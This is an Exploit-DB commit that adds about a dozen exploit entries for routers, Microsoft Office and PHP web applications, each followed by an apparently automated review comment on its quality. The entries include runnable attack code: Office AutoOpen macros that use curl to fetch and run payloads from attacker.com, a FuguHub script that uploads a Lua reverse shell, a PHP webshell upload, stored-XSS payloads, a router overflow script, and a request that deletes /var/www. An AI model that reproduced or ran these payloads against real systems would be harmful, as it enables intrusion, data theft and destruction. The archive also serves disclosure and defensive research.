DB: 2023-07-04

20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
Exploit-DB 2023-07-04 00:16:26 +00:00
parent 7807e6f266
commit ef9b4e5962
20 changed files with 1327 additions and 0 deletions

exploits/hardware/dos/51561.py Executable file
@ -0,0 +1,28 @@
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355
import requests
# Replace the IP address with the router's IP
router_ip = '192.168.0.1'
# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='
# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000 # Example payload, adjust the length as needed
# Send the GET request with the crafted payload
response = requests.get(url + payload)
# Check the response status code
if response.status_code == 200:
print('Buffer overflow triggered successfully')
else:
print('Buffer overflow not triggered')
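Review bot: The success check at the end (`if response.status_code == 200:`) cannot confirm the condition in the title: a 200 only shows the web server was still answering, and `requests.get(url + payload)` has no `timeout=` or exception handling, so a device that stops responding ends in a traceback instead of either message. The header also gives `Tested on: Windows/Linux`, which describes the client, and no firmware build for the TL-WR940N V4; please record the tested firmware so owners can scope exposure against CVE-2023-36355.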

@ -0,0 +1,33 @@
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms
1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
IN MY CASE,
Tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
2) Proof of Concept
Step 1: Go to
Repeater Login Page : http://192.168.0.21/
Step 2:
Add the payload to URL.
Payload:
http://{ip}/cgi-bin/ExportSettings.sh
Payload:
https://github.com/eeduardogoncalves/exploit
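Review bot: The second `Payload:` label at the end points at a GitHub repository, not a payload; label it as a reference so the one relevant request, `http://{ip}/cgi-bin/ExportSettings.sh`, is unambiguous. The description should also say what the exported settings file contains and whether firmware 1.01 is the only version checked, since that decides what an owner has to rotate and which units are affected; no CVE or vendor advisory is cited. The author handle also differs between the header (`ieduardogoncalves`) and the repository URL (`eeduardogoncalves`).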

@ -0,0 +1,40 @@
# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Date: 1/07/2023
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: v15.0
POC:
1 ) Login in demo page , go to this url
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload
<img src=. onerror=alert(document.domain)>
3 ) You will be see alert box
POC:
1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)>
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
2 ) You will be see alert box , stored xss
POC:
1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
after save it
svg file:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
2 ) When click this svg file you will be see alert button
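Review bot: The three `POC:` blocks are not labelled by type or privilege: only the second says `stored xss`, and none states which workplace role the logged-in user needs. Please title each block (gallery search field, title rename, SVG replace) and state the required role for each. The URLs also point at the vendor's shared demo instance with an instance-specific explorer ID (`8b72b2fe-180f-11ee-b326-0242ac11002b`), so they are unlikely to resolve elsewhere; a path on a local install would be reproducible and would keep testing off the public demo.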

@ -0,0 +1,51 @@
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285
## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!
[+]PoC:
```cmd
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```
## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
## Time spend:
01:30:00
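Review bot: The PoC block is fenced as `cmd` but contains a VBA macro (`Sub AutoOpen()` ... `End Sub`); tag it accordingly. The description says the code runs "without being asked what it wants to activate", yet the only artifact shown is an auto-run macro, whose execution depends on the Office macro policy in effect. Please state the macro and Protected View settings used in the test and explain how this macro relates to CVE-2023-28285, otherwise readers cannot tell a product flaw from ordinary macro behaviour. The `## FYI:` section also says the PoC is not included, which belongs in the header.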

@ -0,0 +1,40 @@
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
This exploit is connected with third part exploit server, which waits
for the victim to call him and execute the content from him using the
pipe posting method! This is absolutely a 0-day exploit! This is
absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST
request to the exploit server, and the server is responding back that
way: He creates another hidden malicious file and executed it directly
on the machine of the victim, then everything is disappeared, so
nasty.
STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
## Time spend:
01:27:00
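Review bot: The description and the PoC disagree: the text says the victim "hit the button in the Excel file" and that a POST request is made, while the code is an auto-run macro (`Sub AutoOpen()`) that calls `curl -s` with no request body. Please reconcile the two and state the macro settings under which this was tested. The text also calls this "absolutely a 0-day" while the header cites CVE-2023-33137, and `## Software:` links to Excel although the title names the 32-bit MSO build in general.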

@ -0,0 +1,136 @@
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078
import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#Options for user registration, if no user has been created yet
username = 'admin'
password = 'password'
email = 'admin@admin.com'
parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()
LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
port = args.rport
else:
port = 80
def main():
checkAccount()
def checkAccount():
print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
s = requests.Session()
# Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('h1')
if r.status_code == 404:
print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
exit(0)
userExists = False
userText = 'User database already saved'
for i in search:
if i.string == userText:
userExists = True
if userExists:
print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
login(r,s)
else:
print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
createUser(r,s)
login(r,s)
def createUser(r,s):
data = { email : email ,
'user' : username ,
'password' : password ,
'recoverpassword' : 'on' }
r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
def login(r,s):
print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
data = {'ba_username' : username , 'ba_password' : password}
r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz
#Veryify login
login_Success_Title = 'Web-File-Server'
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('title')
for i in search:
if i != login_Success_Title:
print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
exploit(r,s)
def exploit(r,s):
#Find the file server, default is fs
r = s.get(f"https://{url}:443/fs/cmsdocs/")
code = r.status_code
if code == 404:
print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
#Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default
shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
file_content = f'''
<h2> Check ur nc listener on the port you put in <h2>
<?lsp if request:method() == "GET" then ?>
<?lsp
{shell}
?>
<?lsp else ?>
Wrong request method, goodBye!
<?lsp end ?>
'''
files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
if r.text == 'ok' :
print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
r = s.get(f"https://{url}:443/rev.lsp")
if __name__=='__main__':
try:
main()
except:
print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
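Review bot: Error handling hides failures: the bare `except:` around `main()` at the bottom prints the same goodbye line for a network error, a parse error or Ctrl-C, and the failure branches call `exit(0)`, so a wrapper sees success either way. In `checkAccount()` the "No admin user exists yet" `print` lacks the `f` prefix and will output the braces literally. `hashlib`, `randint` and `encode_multipart_formdata` are imported but never used, and certificate verification is disabled (`verify = False`) with warnings suppressed globally and no comment explaining why.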

@ -0,0 +1,152 @@
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs: Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task
4. open task
5. add comment as "<iframe src="https://14.rs"></iframe> "
POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=
===========================
###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"
ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"
Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"
ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
-----------------------------12298384558648010343132232769--
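Review bot: Required privilege is stated for only one of the two findings: XSS-2 begins with `1.go to admin account`, so it is an admin-set value (`CFG[APP_COPYRIGHT_NAME]`), while XSS-1 says only `login to account`. Please state the role needed for XSS-1 and who views the stored comment, since that sets the severity. The captured requests carry `sid` cookie and `form_session_token` values that should be redacted, and the section numbering starts at `2.` with no section 1.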

exploits/php/webapps/51549.py Executable file
@ -0,0 +1,28 @@
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
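Review bot: The script does not demonstrate the finding it is named for: it ends with `print(response.text)` and never checks whether the `nm_member` value comes back unescaped in the page. The value is also encoded twice, once by `urllib.parse.quote(payload)` and again by `requests` when it is passed through `params=`, so what is sent is not the string the comments describe. The header gives no fix reference; a line stating that `print.php` must HTML-encode `nm_member` on output would make the entry useful to maintainers.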

@ -0,0 +1,55 @@
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Date: 25-05-2023
# Exploit Author: yuyudhn
# Vendor Homepage: https://www.codekop.com/
# Software Link: https://github.com/fauzan1892/pos-kasir-php
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348
# Vulnerability description: The application does not sanitize the filename
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
attacker can exploit this issue by uploading a PHP file and accessing it,
leading to Remote Code Execution.
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/
# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.
Burp Log Example:
```
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
**Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1**
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close
------WebKitFormBoundarymVBHqH4m6KgKBnpa
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg
ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>
ÿÛC
-----------------------------
```
PHP Web Shell location:
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
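Review bot: The Burp log is not a faithful capture: stray `**` markers appear inside the fenced block (before `Upgrade-Insecure-Requests` and after `Sec-Fetch-User: ?1`), several headers are wrapped onto continuation lines, and the body ends in a bare dashed line instead of the closing `------WebKitFormBoundarymVBHqH4m6KgKBnpa--`. The description mentions only the filename, while the request also shows a `.php` name accepted with `Content-Type: image/jpeg` and stored under `assets/img/user/`. Please name the missing server-side checks (extension allow-list, content validation, non-executable upload directory) so the entry maps to a fix, and redact the `PHPSESSID` value.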

@ -0,0 +1,32 @@
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account
2. go to media
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
4. go to svg file (http://localhost/media/malas.svg)
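Review bot: Step 1 (`login to account`) does not say which role can reach the media upload, and step 4 has the uploader open `http://localhost/media/malas.svg` directly, so the write-up never shows another user's session being affected. Please state the required role and how the file is served to other users (content type, same origin as the admin area). The SVG is wrapped in `"""` markers as if it were Python, and numbering starts at `2.` with no section 1.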

@ -0,0 +1,30 @@
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs: Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
=======================================
arbitary directory deleting
GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
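Review bot: The only description is `arbitary directory deleting`, which undersells a destructive request: `delete.php` is called with `dir=/../../../../../..//var/www`. The header should name the impact as arbitrary directory deletion and not only `Directory Traversal`, state which role is needed (the request sits under `/admin/` and carries a session cookie), and warn that replaying it as written removes the target directory. The `id=` and `PHPSESSID-WB-6e6c39` values should be redacted.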

@ -0,0 +1,59 @@
## Exploit Title: spip v4.1.10 - Spoofing Admin account
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.
STATUS: HIGH- Vulnerability
[+]Exploit:
```SVG
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
<linearGradient id="badgeGradient">
<stop offset="0"/>
<stop offset="1"/>
</linearGradient>
</defs>
<g id="heading">
<a xlink:href= "https://rb.gy/74f0y">
<path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
<!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
<text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
</a>
</g>
</svg>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
## Time spend:
00:37:00
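Review bot: The title claims `Spoofing Admin account`, but nothing in the description or the SVG spoofs an account: the file wraps the logo in an `xlink:href` anchor pointing to `https://rb.gy/74f0y` and relies on the administrator clicking it. Please retitle to what is shown (unsanitised SVG upload carrying an external link) and justify or lower `STATUS: HIGH-`. The link uses a URL shortener whose destination is not documented; replace it with a neutral placeholder such as example.com.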

@ -0,0 +1,57 @@
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
# Date: 29/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Release Notes:
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
## Stored XSS
-----------------------------------------------
POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1
promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
-----------------------------------------------
POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS
## Steps to Reproduce:
1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept with terms & Press [Booking]
XSS Fired on Local User Browser
8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
XSS Will Fire and Executed on his Browser
9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
XSS Will Fire and Executed on his Browser
